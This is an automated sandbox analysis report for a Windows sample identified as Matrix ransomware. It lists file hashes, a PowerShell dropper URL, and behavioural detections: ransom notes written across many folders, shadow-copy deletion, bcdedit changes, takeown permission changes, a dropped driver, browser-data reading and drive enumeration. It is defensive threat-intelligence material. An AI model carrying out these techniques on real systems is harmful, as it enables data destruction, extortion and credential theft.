matrix | 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad

Analysis

max time kernel
114s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
06-03-2022 01:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
Size

1.5MB
MD5

c3376b76d094ec9af26b125dceb9abab
SHA1

42f96a7dda594cf5ba26c4c302366cca54a5e794
SHA256

3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad
SHA512

1a1e11996f6407378ac1a758001e4d71508a3593862a8b4b26f764924f71ddb8e2ea66d67c3794d31e84274d23e355e93275151aff9a70134bb776b1fa3b040e

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\All Users\Microsoft\UEV\Scripts\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3kzncs28.default-release\datareporting\archived\2022-01\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Public\Downloads\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\MEIPreload\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\ProgramData\Package Cache\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\89.0.4389.114\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\ProgramData\USOPrivate\UpdateStore\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4860	bcdedit.exe
4984	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
155	1808	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	wUY1KnWt64.exe

Executes dropped EXE 64 IoCs

pid	Process
3036	NWoU3LGX.exe
1248	wUY1KnWt.exe
2448	wUY1KnWt64.exe
3012	wUY1KnWt.exe
308	wUY1KnWt.exe
3136	wUY1KnWt.exe
3244	wUY1KnWt.exe
2972	wUY1KnWt.exe
3600	wUY1KnWt.exe
260	wUY1KnWt.exe
2632	wUY1KnWt.exe
2504	wUY1KnWt.exe
2100	wUY1KnWt.exe
2176	wUY1KnWt.exe
2752	wUY1KnWt.exe
680	wUY1KnWt.exe
3804	wUY1KnWt.exe
2488	wUY1KnWt.exe
2712	wUY1KnWt.exe
2752	wUY1KnWt.exe
3380	wUY1KnWt.exe
1908	wUY1KnWt.exe
364	wUY1KnWt.exe
2176	wUY1KnWt.exe
624	wUY1KnWt.exe
2116	wUY1KnWt.exe
2580	wUY1KnWt.exe
2488	wUY1KnWt.exe
2104	wUY1KnWt.exe
3552	wUY1KnWt.exe
2844	wUY1KnWt.exe
2844	wUY1KnWt.exe
2176	wUY1KnWt.exe
2580	wUY1KnWt.exe
3012	wUY1KnWt.exe
2104	wUY1KnWt.exe
2176	wUY1KnWt.exe
2700	wUY1KnWt.exe
2176	wUY1KnWt.exe
2176	wUY1KnWt.exe
920	wUY1KnWt.exe
2580	wUY1KnWt.exe
920	wUY1KnWt.exe
3360	wUY1KnWt.exe
920	wUY1KnWt.exe
1544	wUY1KnWt.exe
3380	wUY1KnWt.exe
3616	wUY1KnWt.exe
2700	wUY1KnWt.exe
1344	wUY1KnWt.exe
3560	wUY1KnWt.exe
3616	wUY1KnWt.exe
3656	wUY1KnWt.exe
3804	wUY1KnWt.exe
1272	wUY1KnWt.exe
4072	wUY1KnWt.exe
3360	wUY1KnWt.exe
3656	wUY1KnWt.exe
1272	wUY1KnWt.exe
3804	wUY1KnWt.exe
2712	wUY1KnWt.exe
3360	wUY1KnWt.exe
560	wUY1KnWt.exe
2948	wUY1KnWt.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ResolveReceive.tiff	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Pictures\FormatSearch.tiff	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Pictures\BlockResolve.tiff	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00060000000220e5-150.dat	upx
behavioral2/files/0x00060000000220e5-151.dat	upx
behavioral2/files/0x00060000000220e5-154.dat	upx
behavioral2/files/0x00060000000220e5-155.dat	upx
behavioral2/files/0x00060000000220e5-156.dat	upx
behavioral2/files/0x00060000000220e5-157.dat	upx
behavioral2/files/0x00060000000220e5-158.dat	upx
behavioral2/files/0x00060000000220e5-159.dat	upx
behavioral2/files/0x00060000000220e5-160.dat	upx
behavioral2/files/0x00060000000220e5-161.dat	upx
behavioral2/files/0x00060000000220e5-162.dat	upx
behavioral2/files/0x00060000000220e5-163.dat	upx
behavioral2/files/0x00060000000220e5-165.dat	upx
behavioral2/files/0x00060000000220e5-166.dat	upx
behavioral2/files/0x00060000000220e5-167.dat	upx
behavioral2/files/0x00060000000220e5-168.dat	upx
behavioral2/files/0x00060000000220e5-169.dat	upx
behavioral2/files/0x00060000000220e5-170.dat	upx
behavioral2/files/0x00060000000220e5-171.dat	upx
behavioral2/files/0x00060000000220e5-172.dat	upx
behavioral2/files/0x00060000000220e5-173.dat	upx
behavioral2/files/0x00060000000220e5-174.dat	upx
behavioral2/files/0x00060000000220e5-175.dat	upx
behavioral2/files/0x00060000000220e5-176.dat	upx
behavioral2/files/0x00060000000220e5-178.dat	upx
behavioral2/files/0x00060000000220e5-179.dat	upx
behavioral2/files/0x00060000000220e5-180.dat	upx
behavioral2/files/0x00060000000220e5-181.dat	upx
behavioral2/files/0x00060000000220e5-182.dat	upx
behavioral2/files/0x00060000000220e5-183.dat	upx
behavioral2/files/0x00060000000220e5-184.dat	upx
behavioral2/files/0x00060000000220e5-185.dat	upx
behavioral2/files/0x00060000000220e5-186.dat	upx
behavioral2/files/0x00060000000220e5-187.dat	upx
behavioral2/files/0x00060000000220e5-188.dat	upx
behavioral2/files/0x00060000000220e5-189.dat	upx
behavioral2/files/0x00060000000220e5-190.dat	upx
behavioral2/files/0x00060000000220e5-191.dat	upx
behavioral2/files/0x00060000000220e5-192.dat	upx
behavioral2/files/0x00060000000220e5-193.dat	upx
behavioral2/files/0x00060000000220e5-194.dat	upx
behavioral2/files/0x00060000000220e5-195.dat	upx
behavioral2/files/0x00060000000220e5-196.dat	upx
behavioral2/files/0x00060000000220e5-197.dat	upx
behavioral2/files/0x00060000000220e5-198.dat	upx
behavioral2/files/0x00060000000220e5-199.dat	upx
behavioral2/files/0x00060000000220e5-200.dat	upx
behavioral2/files/0x00060000000220e5-201.dat	upx
behavioral2/files/0x00060000000220e5-202.dat	upx
behavioral2/files/0x00060000000220e5-203.dat	upx
behavioral2/files/0x00060000000220e5-204.dat	upx
behavioral2/files/0x00060000000220e5-205.dat	upx
behavioral2/files/0x00060000000220e5-206.dat	upx
behavioral2/files/0x00060000000220e5-207.dat	upx
behavioral2/files/0x00060000000220e5-208.dat	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	wscript.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4872	takeown.exe
2972	takeown.exe
4980	takeown.exe
4360	takeown.exe
4712	takeown.exe
5104	takeown.exe
4520	takeown.exe
4228	takeown.exe
2880	takeown.exe
2844	takeown.exe
3804	takeown.exe
4500	takeown.exe
4660	takeown.exe
3080	takeown.exe
4700	takeown.exe
2408	takeown.exe
2880	takeown.exe
2880	takeown.exe
3484	takeown.exe
4876	takeown.exe
5072	takeown.exe
4300	takeown.exe
1136	takeown.exe
376	takeown.exe
1888	takeown.exe
300	takeown.exe
4428	takeown.exe
4236	takeown.exe
1872	takeown.exe
4236	takeown.exe
2216	takeown.exe
452	Process not Found
4284	Process not Found
3380	takeown.exe
276	takeown.exe
4884	takeown.exe
4916	takeown.exe
5032	takeown.exe
1628	takeown.exe
4352	takeown.exe
1492	takeown.exe
3012	takeown.exe
3360	takeown.exe
4320	takeown.exe
5060	takeown.exe
4368	takeown.exe
4316	takeown.exe
4552	takeown.exe
2488	takeown.exe
4360	takeown.exe
296	takeown.exe
732	takeown.exe
3528	takeown.exe
560	takeown.exe
4324	Process not Found
3656	takeown.exe
3596	takeown.exe
2580	takeown.exe
3616	takeown.exe
1476	takeown.exe
4132	takeown.exe
4552	takeown.exe
4260	Process not Found
3560	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\K:	wUY1KnWt64.exe
File opened (read-only)	\??\L:	wUY1KnWt64.exe
File opened (read-only)	\??\S:	wUY1KnWt64.exe
File opened (read-only)	\??\X:	wUY1KnWt64.exe
File opened (read-only)	\??\K:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\G:	wUY1KnWt64.exe
File opened (read-only)	\??\I:	wUY1KnWt64.exe
File opened (read-only)	\??\R:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\J:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\A:	wUY1KnWt64.exe
File opened (read-only)	\??\J:	wUY1KnWt64.exe
File opened (read-only)	\??\V:	wUY1KnWt64.exe
File opened (read-only)	\??\Z:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\X:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\U:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\O:	wUY1KnWt64.exe
File opened (read-only)	\??\P:	wUY1KnWt64.exe
File opened (read-only)	\??\T:	wUY1KnWt64.exe
File opened (read-only)	\??\Y:	wUY1KnWt64.exe
File opened (read-only)	\??\O:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\F:	wUY1KnWt64.exe
File opened (read-only)	\??\H:	wUY1KnWt64.exe
File opened (read-only)	\??\P:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\G:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\E:	wUY1KnWt64.exe
File opened (read-only)	\??\N:	wUY1KnWt64.exe
File opened (read-only)	\??\U:	wUY1KnWt64.exe
File opened (read-only)	\??\W:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\S:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\Q:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\B:	wUY1KnWt64.exe
File opened (read-only)	\??\R:	wUY1KnWt64.exe
File opened (read-only)	\??\Z:	wUY1KnWt64.exe
File opened (read-only)	\??\Y:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\H:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
